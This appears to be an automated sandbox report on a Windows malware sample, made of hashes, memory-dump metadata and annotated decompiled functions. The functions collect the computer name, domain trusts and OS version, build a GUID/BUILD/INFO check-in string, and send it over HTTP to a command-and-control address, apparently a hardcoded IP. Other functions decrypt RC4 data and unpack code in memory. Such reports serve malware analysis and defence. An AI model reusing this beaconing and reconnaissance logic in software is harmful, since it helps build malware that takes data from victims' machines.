                                                                                                                                                    • Instruction ID: 66be5cb36666c332e92d05d0aac8d9c2e70ff2c490bae00d586505d2c3a5186c
                                                                                                                                                    • Opcode Fuzzy Hash: 47dcfaa247d8baec4c012d245cfd1c6a90337832920eee3f428fc18f5d00a5e6
                                                                                                                                                    • Instruction Fuzzy Hash: D62156B1D0061A9BCB14DFA9D94479EFBF4FB48324F00815AD819B7600D778A900CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348057063.00000000049DD000.00000040.00000001.sdmp, Offset: 049DD000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8c25da433ed6b1692dbf309506b6fcc349ce0aeb91a741cde32a504a60a37dcd
                                                                                                                                                    • Instruction ID: 22b6718ed35a353b2a5018548aeff008c4c8135688c78a9b0de25c467b44ab9d
                                                                                                                                                    • Opcode Fuzzy Hash: 8c25da433ed6b1692dbf309506b6fcc349ce0aeb91a741cde32a504a60a37dcd
                                                                                                                                                    • Instruction Fuzzy Hash: D001A771505344ABEB104E25EC84BA7FF9CEF81668F08C669ED051B242D379B945C6F1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.348057063.00000000049DD000.00000040.00000001.sdmp, Offset: 049DD000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e63fb8acca4e3cf187229aa7b069f429417ec67a292af6eb48e9e8f64f411b0b
                                                                                                                                                    • Instruction ID: e38e74691dcd93b87d668a05065e691c0ea53ce091bf966e554d12f636118160
                                                                                                                                                    • Opcode Fuzzy Hash: e63fb8acca4e3cf187229aa7b069f429417ec67a292af6eb48e9e8f64f411b0b
                                                                                                                                                    • Instruction Fuzzy Hash: 8601406140E3C45FD7128B219C94B52BFB4EF43624F09C1DBD9858F293C2695849C772
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Executed Functions

                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E00611FC0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				long _v12;
                                                                                                                                                    				void* _v16;
                                                                                                                                                    				signed short _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				void _v28;
                                                                                                                                                    				void _v32;
                                                                                                                                                    				void* _v36;
                                                                                                                                                    				long _v40;
                                                                                                                                                    				long _v44;
                                                                                                                                                    				int _v48;
                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                    				char* _v64;
                                                                                                                                                    				signed short _v84;
                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                    				char* _v92;
                                                                                                                                                    				long _v96;
                                                                                                                                                    				void* _v108;
                                                                                                                                                    				char _v368;
                                                                                                                                                    				char _v628;
                                                                                                                                                    				int _t79;
                                                                                                                                                    				void* _t80;
                                                                                                                                                    				void* _t83;
                                                                                                                                                    				void* _t141;
                                                                                                                                                    
                                                                                                                                                    				E006114A0( &_v108, 0, 0x3c);
                                                                                                                                                    				_v108 = 0x3c;
                                                                                                                                                    				_v92 =  &_v368;
                                                                                                                                                    				_v88 = 0x104;
                                                                                                                                                    				_v64 =  &_v628;
                                                                                                                                                    				_v60 = 0x104;
                                                                                                                                                    				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
                                                                                                                                                    				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
                                                                                                                                                    				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
                                                                                                                                                    				if(_t79 != 0) {
                                                                                                                                                    					if(_v96 == 0) {
                                                                                                                                                    						_v96 = 3;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v96 == 3 || _v96 == 4) {
                                                                                                                                                    						_t80 = E006124D0(); // executed
                                                                                                                                                    						_v36 = _t80;
                                                                                                                                                    						if(_v36 != 0) {
                                                                                                                                                    							_v20 = _v84;
                                                                                                                                                    							_v24 = 0x84080100;
                                                                                                                                                    							if(_v96 == 4) {
                                                                                                                                                    								_v24 = _v24 | 0x00803000;
                                                                                                                                                    							}
                                                                                                                                                    							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
                                                                                                                                                    							_v16 = _t83;
                                                                                                                                                    							if(_v16 != 0) {
                                                                                                                                                    								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x617050, _v24, 1);
                                                                                                                                                    								if(_v8 != 0) {
                                                                                                                                                    									if(_v96 == 4) {
                                                                                                                                                    										_v40 = 4;
                                                                                                                                                    										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
                                                                                                                                                    										_v28 = _v28 | 0x00001100;
                                                                                                                                                    										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
                                                                                                                                                    									}
                                                                                                                                                    									HttpSendRequestA(_v8, 0, 0, 0, 0);
                                                                                                                                                    									_v32 = 0;
                                                                                                                                                    									_v44 = 4;
                                                                                                                                                    									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
                                                                                                                                                    									if(_v32 != 0xc8 || _a8 == 0) {
                                                                                                                                                    										L26:
                                                                                                                                                    										InternetCloseHandle(_v8); // executed
                                                                                                                                                    										InternetCloseHandle(_v16);
                                                                                                                                                    										if(_v32 != 0xc8) {
                                                                                                                                                    											return 0;
                                                                                                                                                    										}
                                                                                                                                                    										return 1;
                                                                                                                                                    									} else {
                                                                                                                                                    										 *_a16 = 0;
                                                                                                                                                    										while(1 != 0) {
                                                                                                                                                    											_v48 = InternetReadFile(_v8, _a8, _a12,  &_v12);
                                                                                                                                                    											if(_v48 != 1 || _v12 <= 0) {
                                                                                                                                                    												goto L26;
                                                                                                                                                    											} else {
                                                                                                                                                    												_a8 = _a8 + _v12;
                                                                                                                                                    												_a12 = _a12 - _v12;
                                                                                                                                                    												 *_a16 =  *_a16 + _v12;
                                                                                                                                                    												continue;
                                                                                                                                                    											}
                                                                                                                                                    										}
                                                                                                                                                    										goto L26;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    								InternetCloseHandle(_v16);
                                                                                                                                                    								return 0;
                                                                                                                                                    							} else {
                                                                                                                                                    								return 0;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						return 0;
                                                                                                                                                    					} else {
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return 0;
                                                                                                                                                    			}

APIs
• InternetCrackUrlA.WININET(00611AB9,00000000,00000000,0000003C), ref: 0061202C
Strings
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: CrackInternet
• String ID: <$B%a$GET
• API String ID: 1381609488-3357173869
• Opcode ID: f5acebf211a56d0586872e3b5f15cada2fb4ac8aa6e76b78391c87dfd7b389e3
• Instruction ID: 8608a015060b1a11a3ed4062ddd993fb279471ee5d7f18d67297e92430b70ccb
• Opcode Fuzzy Hash: f5acebf211a56d0586872e3b5f15cada2fb4ac8aa6e76b78391c87dfd7b389e3
• Instruction Fuzzy Hash: 3D714A70D0020AEFEB14CFA0CC59BEEB7B6FB48301F148129E611AB280D7749A95CF54
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNELBASE(00000000,0000099E,00003000,00000040,0000099E,006B12C6), ref: 006B1897
• VirtualAlloc.KERNEL32(00000000,000000C6,00003000,00000040,006B12FF), ref: 006B18CE
• VirtualAlloc.KERNEL32(00000000,0000759C,00003000,00000040), ref: 006B192E
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006B1964
• VirtualProtect.KERNEL32(00610000,00000000,00000004,006B179A), ref: 006B1A78
• VirtualProtect.KERNEL32(00610000,00001000,00000004,006B179A), ref: 006B1A9F
• VirtualProtect.KERNEL32(00000000,?,00000002,006B179A), ref: 006B1B73
• VirtualProtect.KERNEL32(00000000,?,00000002,006B179A,?), ref: 006B1BC9
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006B1BED
Memory Dump Source
• Source File: 00000010.00000002.487458396.00000000006B1000.00000040.00020000.sdmp, Offset: 006B1000, based on PE: false
Similarity
• API ID: Virtual$Protect$Alloc$Free
• String ID:
• API String ID: 2574235972-0
• Opcode ID: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
• Instruction ID: 7061b6e3f8d6015b6e4087619e5eaee3070ea449921b068994a5cd1b3eee6d5b
• Opcode Fuzzy Hash: 03bc5af6c7ce064b2e6ef2afbe8d338117e198569f8b4eb403ed261dfbad5161
• Instruction Fuzzy Hash: 05D160B2700B01AFDF908F14C9D8B9177ABFF85320B594198ED099F76AD770A840CB68
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 37%
			#include <windows.h>
			#include <wincrypt.h>

			/* Decompiled routine at 0x00612CB0. Decrypts the _a8-byte buffer at _a4 in place
			   with a CryptoAPI RC4 key derived from the SHA-1 hash of the _a16-byte seed at _a12.
			   Returns the decrypted length, or 0 if any CryptoAPI call fails. The decompiler's
			   stack-offset names are kept; the return-value checks that the decompiler rendered
			   as stale register tests are written out explicitly. */
			int E00612CB0(BYTE* _a4, int _a8, BYTE* _a12, DWORD _a16) {
				HCRYPTHASH _v8 = 0;
				HCRYPTPROV _v12 = 0;
				HCRYPTKEY _v16 = 0;
				int _v20 = 0;
				/* 0x280011: key length 0x28 (40 bits) in the high word,
				   CRYPT_EXPORTABLE | CRYPT_NO_SALT (0x11) in the low word */
				DWORD _v24 = 0x280011;

				/* PROV_RSA_FULL (1) with CRYPT_VERIFYCONTEXT (0xF0000000): no key container needed */
				if(CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000) != 0) { // executed
					/* CALG_SHA1 = 0x8004 */
					if(CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8) != 0) { // executed
						/* feed the key seed into the hash */
						if(CryptHashData(_v8, _a12, _a16, 0) != 0) {
							/* CALG_RC4 = 0x6801; the 40-bit key comes straight from the hash */
							if(CryptDeriveKey(_v12, 0x6801, _v8, _v24,  &_v16) != 0) { // executed
								/* final block, in place; _a8 receives the plaintext length */
								if(CryptDecrypt(_v16, 0, 1, 0, _a4, (DWORD*) &_a8) != 0) {
									_v20 = _a8;
								}
							}
						}
					}
				}
				/* release handles in reverse order of acquisition */
				if(_v8 != 0) {
					CryptDestroyHash(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					CryptDestroyKey(_v16);
					_v16 = 0;
				}
				if(_v12 != 0) {
					CryptReleaseContext(_v12, 0);
					_v12 = 0;
				}
				return _v20;
			}

APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00612CE8
• CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00612D0D
• CryptDestroyHash.ADVAPI32(00000000), ref: 00612D8A
• CryptDestroyKey.ADVAPI32(00000000), ref: 00612DA1
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00612DBA
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
• String ID:
• API String ID: 1222261195-0
• Opcode ID: fb95e833f5d99fde2cca6303f21b4c61c98bce1a9742dcd129006842046f6dae
• Instruction ID: d5565fa87042775128166fc50eac0159afbdcedc86893f2a08eec3b1c53fdbce
• Opcode Fuzzy Hash: fb95e833f5d99fde2cca6303f21b4c61c98bce1a9742dcd129006842046f6dae
• Instruction Fuzzy Hash: 3F311AB5E00209FBEB14CF91DC98FEE77BAAF48705F148549F601A7280D7B49A94DB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
E006133E0() {
	struct HINSTANCE__* _v8;
	_Unknown_base(*)()* _v12;
	struct _SYSTEM_INFO _v48;

	// zero the 0x24-byte SYSTEM_INFO structure (E006114A0 is apparently the sample's memset-style helper)
	E006114A0( &_v48, 0, 0x24);
	// resolve GetNativeSystemInfo at run time; fall back to GetSystemInfo when the export is absent
	_v8 = GetModuleHandleA("kernel32.dll");
	if(_v8 != 0) {
		_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
		if(_v12 == 0) {
			GetSystemInfo( &_v48);
		} else {
			_v12( &_v48);
		}
		// low WORD of dwOemId is wProcessorArchitecture; 9 == PROCESSOR_ARCHITECTURE_AMD64
		// returns 1 on a 64-bit Windows host, 0 otherwise (the caller E00611A80 uses this to pick the x64/x32 check-in string)
		if((_v48.dwOemId & 0x0000ffff) != 9) {
			return 0;
		} else {
			return 1;
		}
	}
	return 0;
}

Instruction addresses: 0x006133ee, 0x00613401, 0x00613408, 0x0061341d, 0x00613424, 0x00613433, 0x00613426, 0x0061342a, 0x0061342a, 0x00613440, 0x00000000, 0x00613442, 0x00000000, 0x00613442, 0x00613440, 0x00000000

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00611B01), ref: 006133FB
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00613417
• GetNativeSystemInfo.KERNELBASE(?), ref: 0061342A
Strings
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: AddressHandleInfoModuleNativeProcSystem
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 3469989633-192647395
• Opcode ID: 756ae912b47a5e60a0005117ca118972c465a56fcdef022e2d18eb4fdd9a0d63
• Instruction ID: 4624b33e4be5cd6507fe1f3879bd02fe01205f3f3902884e5689e0581d7ced49
• Opcode Fuzzy Hash: 756ae912b47a5e60a0005117ca118972c465a56fcdef022e2d18eb4fdd9a0d63
• Instruction Fuzzy Hash: 76013135D00218EBCB14DFF59849BED7BBAAB08711F598565E602A3280EB7487C49761
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 95%
E00611A80(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
	intOrPtr _v8;        // result of the submit step (1 == success)
	signed int _v12;     // raw GetVersion() value
	signed int _v16;     // Windows minor version (second byte of GetVersion)
	signed int _v20;     // Windows major version (low byte of GetVersion)
	intOrPtr _v24;       // loop-continue flag
	intOrPtr _v28;       // high DWORD of the 64-bit GUID value
	intOrPtr _v32;       // low DWORD of the 64-bit GUID value
	intOrPtr _v36;       // 1 when E006133E0 reports a 64-bit host
	char _v68;           // IP string (filled by E00612500)
	char _v324;          // INFO string (filled by E006130D0)
	char _v2372;         // EXT string (filled by E006123A0)
	char _v6468;         // assembled check-in parameter string
	intOrPtr _t47;
	intOrPtr _t56;
	char* _t63;
	intOrPtr _t66;
	intOrPtr _t69;
	intOrPtr _t70;
	intOrPtr _t71;
	char* _t72;
	void* _t75;
	char _t87;           // first byte of the global buffer (not declared by the decompiler)
	char* _t89;
	intOrPtr _t95;
	char* _t104;
	intOrPtr _t106;
	void* _t110;
	void* _t113;
	void* _t114;

	_t95 = __edx;
	// stack probe for the 0x1940 bytes of local buffers (likely the compiler's _chkstk helper)
	E00611420(0x1940);
	_v12 = GetVersion();
	// E00612610 returns a 64-bit value in edx:eax; it is reported as the GUID field below
	_t47 = E00612610(_t95); // executed
	_v32 = _t47;
	_v28 = _t95;
	// collect the INFO, IP and EXT strings that go into the check-in parameters
	E006130D0( &_v324); // executed
	E00612500( &_v68,  &_v68); // executed
	E006123A0( &_v2372); // executed
	_t113 = _t110 + 0xc;
	// GetVersion(): low byte is the major version, the next byte the minor version
	_v20 = _v12 & 0xff;
	_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
	// E006133E0 returns 1 on a 64-bit host; selects the "(x64)" or "(x32)" suffix
	_t56 = E006133E0(); // executed
	_v36 = _t56;
	// build "GUID=...&BUILD=...&INFO=...&EXT=...&IP=...&TYPE=1&WIN=major.minor(xNN)";
	// the _push(_v16) is the decompiler's rendering of the last vararg (minor version)
	if(_v36 != 1) {
		_push(_v16);
		wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E00612590( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
		_t114 = _t113 + 0x28;
	} else {
		_push(_v16);
		_t75 = E00612590( &_v324); // executed
		wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
		_t114 = _t113 + 0x28;
	}
	// global pointer at 0x617298: a 0x400-byte buffer allocated on first use and initialised to an empty string
	if( *0x617298 == 0) {
		_t71 = E00611390(0x400);
		_t114 = _t114 + 4;
		 *0x617298 = _t71;
		_t72 =  *0x617298; // 0x13dbeb8
		 *_t72 = 0;
	}
	_v24 = 1;
	while(_v24 == 1) {
		_t63 =  *0x617298; // 0x13dbeb8
		_t87 =  *_t63;
		// empty buffer: ask E00612640 to fill it; its return value decides whether the loop continues
		if( *_t63 == 0) {
			_t106 =  *0x617298; // 0x13dbeb8
			_t70 = E00612640(_t87, _t106);
			_t114 = _t114 + 4;
			_v24 = _t70;
		}
		// submit the assembled parameter string together with the caller's three arguments
		_t89 =  *0x617298; // 0x13dbeb8
		_t66 = E006128B0(_t89,  &_v6468, _a4, _a8, _a12); // executed
		_t114 = _t114 + 0x14;
		_v8 = _t66;
		if(_v8 == 1) {
			_t69 = E006119E0(_t89, _a4);
			_t114 = _t114 + 4;
			_v8 = _t69;
		}
		// on failure clear the buffer so the next iteration refills it; on success return 1
		if(_v8 != 1) {
			_t104 =  *0x617298; // 0x13dbeb8
			 *_t104 = 0;
			continue;
		} else {
			return 1;
		}
	}
	return 0;
}

Instruction addresses: 0x00611a80, 0x00611a88, 0x00611a93, 0x00611a96, 0x00611a9b, 0x00611a9e, 0x00611aa8, 0x00611ab4, 0x00611ac3, 0x00611ac8, 0x00611adf, 0x00611af9, 0x00611afc, 0x00611b01
                                                                                                                                                    0x00611b08
                                                                                                                                                    0x00611b4c
                                                                                                                                                    0x00611b7d
                                                                                                                                                    0x00611b83
                                                                                                                                                    0x00611b0a
                                                                                                                                                    0x00611b0d
                                                                                                                                                    0x00611b24
                                                                                                                                                    0x00611b3e
                                                                                                                                                    0x00611b44
                                                                                                                                                    0x00611b44
                                                                                                                                                    0x00611b8d
                                                                                                                                                    0x00611b94
                                                                                                                                                    0x00611b99
                                                                                                                                                    0x00611b9c
                                                                                                                                                    0x00611ba9
                                                                                                                                                    0x00611bae
                                                                                                                                                    0x00611bae
                                                                                                                                                    0x00611bb2
                                                                                                                                                    0x00611bb9
                                                                                                                                                    0x00611bcb
                                                                                                                                                    0x00611bd0
                                                                                                                                                    0x00611bd6
                                                                                                                                                    0x00611bd8
                                                                                                                                                    0x00611bdf
                                                                                                                                                    0x00611be4
                                                                                                                                                    0x00611be7
                                                                                                                                                    0x00611be7
                                                                                                                                                    0x00611bfd
                                                                                                                                                    0x00611c04
                                                                                                                                                    0x00611c09
                                                                                                                                                    0x00611c0c
                                                                                                                                                    0x00611c13
                                                                                                                                                    0x00611c19
                                                                                                                                                    0x00611c1e
                                                                                                                                                    0x00611c21
                                                                                                                                                    0x00611c21
                                                                                                                                                    0x00611c28
                                                                                                                                                    0x00611c39
                                                                                                                                                    0x00611c3f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611c2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00611c2a
                                                                                                                                                    0x00611c28
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(?,006118CD,?,00100000,?), ref: 00611A8D
                                                                                                                                                      • Part of subcall function 006130D0: GetComputerNameA.KERNEL32 ref: 006130FA
                                                                                                                                                      • Part of subcall function 006130D0: lstrcatA.KERNEL32(00100000,?), ref: 0061310F
                                                                                                                                                      • Part of subcall function 006130D0: lstrcatA.KERNEL32(00100000, @ ), ref: 0061311E
                                                                                                                                                      • Part of subcall function 006130D0: lstrcatA.KERNEL32(00100000,?), ref: 00613142
                                                                                                                                                      • Part of subcall function 00612500: lstrcpyA.KERNEL32(00611AB9,185.189.150.70,?,?,00611AB9,?,?), ref: 00612520
                                                                                                                                                      • Part of subcall function 006123A0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00611AC8,?,?,00611AC8,?,?,?), ref: 006123C1
                                                                                                                                                      • Part of subcall function 006133E0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00611B01), ref: 006133FB
                                                                                                                                                    • wsprintfA.USER32 ref: 00611B3E
                                                                                                                                                    • wsprintfA.USER32 ref: 00611B7D
                                                                                                                                                    Strings
                                                                                                                                                    • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 00611B32
                                                                                                                                                    • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 00611B71
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                                                                                                                                                    • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                                                                                                                                                    • API String ID: 768865819-2171647522
                                                                                                                                                    • Opcode ID: 1b53fd73a4ec29c1b5c3f34365ba0ac9fb2fc4a65b290ca7062b44ce94cd5e47
                                                                                                                                                    • Instruction ID: 461b6262019a33f152484f8d5ce8ab16be62a6dc7250317d6188e17163320d1b
                                                                                                                                                    • Opcode Fuzzy Hash: 1b53fd73a4ec29c1b5c3f34365ba0ac9fb2fc4a65b290ca7062b44ce94cd5e47
                                                                                                                                                    • Instruction Fuzzy Hash: 0251A5B2D04219DBDB14DF94DC91EFE77BABB58300F0C816DF20A9B251E6349A85CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00611390(long _a4) {
                                                                                                                                                    				void* _t4;
                                                                                                                                                    				void* _t6;
                                                                                                                                                    
                                                                                                                                                    				if( *0x61715c == 0) {
                                                                                                                                                    					 *0x61715c = GetProcessHeap();
                                                                                                                                                    				}
                                                                                                                                                    				if( *0x61715c == 0) {
                                                                                                                                                    					return 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t6 =  *0x61715c; // 0x1380000
                                                                                                                                                    					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
                                                                                                                                                    					return _t4;
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x0061139a
                                                                                                                                                    0x006113a2
                                                                                                                                                    0x006113a2
                                                                                                                                                    0x006113ae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006113b0
                                                                                                                                                    0x006113b6
                                                                                                                                                    0x006113bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x006113bd

                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                    • RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                    • Opcode ID: 90fbf9c4e4d38b44e90aa2d60c7d0541129e6eb2d7c74de47bcb80692e2de2cc
                                                                                                                                                    • Instruction ID: 4d74110a65be11daa19efee29675d9dbe0a9f88d8d9202892e0e768ffb0e5128
                                                                                                                                                    • Opcode Fuzzy Hash: 90fbf9c4e4d38b44e90aa2d60c7d0541129e6eb2d7c74de47bcb80692e2de2cc
                                                                                                                                                    • Instruction Fuzzy Hash: 4EE0B630108645EBD7089FA1FC0D7E537BAA307301F0CE516A6058A6A0CA759880CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00011AFE,0062ACA3), ref: 0062BAF7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 70d1420a2b6f767c50d9759a8b683d35e8631ed5e16ee4bee663ee49372e433b
                                                                                                                                                    • Instruction ID: 0d325843eb56ffcb731cdb7b49b090a1093fb479fc76dfb729b7604cb4c2325e
                                                                                                                                                    • Opcode Fuzzy Hash: 70d1420a2b6f767c50d9759a8b683d35e8631ed5e16ee4bee663ee49372e433b
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E006128B0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
                                                                                                                                                    				void* _v8;
                                                                                                                                                    				void* _v12;
                                                                                                                                                    				signed short _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				void _v24;
                                                                                                                                                    				void _v28;
                                                                                                                                                    				void* _v32;
                                                                                                                                                    				int _v36;
                                                                                                                                                    				long _v40;
                                                                                                                                                    				int _v44;
                                                                                                                                                    				int _v48;
                                                                                                                                                    				long _v52;
                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                    				char* _v68;
                                                                                                                                                    				signed short _v88;
				intOrPtr _v92;
				char* _v96;
				long _v100;
				void* _v112;
				char _v372;
				char _v632;
				int _t90;
				int _t100;
				void* _t145;

				E006114A0( &_v112, 0, 0x3c); // memset-style helper (inferred from usage): zero a URL_COMPONENTSA, 0x3c = sizeof on x86
				_v112 = 0x3c; // dwStructSize
				_v96 =  &_v372; // lpszHostName
				_v92 = 0x104; // dwHostNameLength = MAX_PATH
				_v68 =  &_v632; // lpszUrlPath
				_v64 = 0x104; // dwUrlPathLength = MAX_PATH
				_v36 = 0;
				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded"); // dwHeadersLength
				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0; // raw frame offsets left by the decompiler; most likely
				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0; // NUL-terminating the host and path buffers before parsing
				if(_a8 != 0) {
					_v36 = lstrlenA(_a8); // dwOptionalLength: POST body supplied by the caller
				}
				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) { // _a4 = C2 URL
					if(_v100 == 0) { // nScheme == INTERNET_SCHEME_DEFAULT
						_v100 = 3; // fall back to INTERNET_SCHEME_HTTP
					}
